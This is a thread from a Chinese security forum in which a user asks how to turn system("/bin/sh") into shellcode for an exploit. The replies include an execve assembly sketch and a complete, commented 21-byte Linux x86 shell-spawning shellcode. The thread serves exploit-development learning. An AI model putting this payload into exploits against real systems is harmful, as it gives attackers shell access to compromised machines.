看雪论坛

【求助】system("/bin/sh")如何转换为机器码加到shellcode里面去

petercheng 2016-12-5 202
在shellcode里面实现system("/bin/sh"),当攻击成功后实现打开一个新的shell。请大神解答
最新回复 (5)
1
Keoyo 2016-12-5
2
exploit-db上Linux相关的shellcode有很多啊
王一航 6天前
3
可以参考一下这个视频 , https://www.youtube.com/watch?v=VwTUIZiJ5m4 , 讲了一些 shellcode 的技巧和优化方法 , 还有这篇文章 Shellcode奇技淫巧汇总[持续更新]http://www.jianshu.com/p/a706ddc1d6bb
沈园 5天前
4
为什么要调用system呢,直接系统调用啊,也就几十个字节的事情
9
netwind 5天前
5


mov eax,0xb
mov ebx,bin_sh;  "/bin/sh"
xor ecx,ecx
xor edx,edx
int 0x80	


王一航 4天前
6

; Length : 21 Bytes
; Tested on : Linux x86
; Author : WangYihang
; Email : yihangwanger@gmail.com
; More : https://coding.net/u/yihangwang/p/pwnme/git
global _start
	_start:
		; execve
		; 这里需要保证 '/bin//sh' 以 0 结尾
		; 因此需要在汇编中写入代码手动将其调整为 0
		xor ecx, ecx
		; hex("/bin//sh") = 0x2f62696e2f2f7368
		push ecx ; string must end with \x00
		push 68732f2fH
		push 6e69622fH
		mov ebx, esp
		; xor eax, eax
		; mov al, 0bH
		; use push pop to cut down the shellcode
		push byte 0bH
		pop eax
		cdq ; set edx = 0
		int 80H	


返回



©2000-2017 看雪学院 | Based on Xiuno BBS | 知道创宇带宽支持 | 微信公众号:ikanxue
Time: 0.011, SQL: 7 / 京ICP备10040895号-17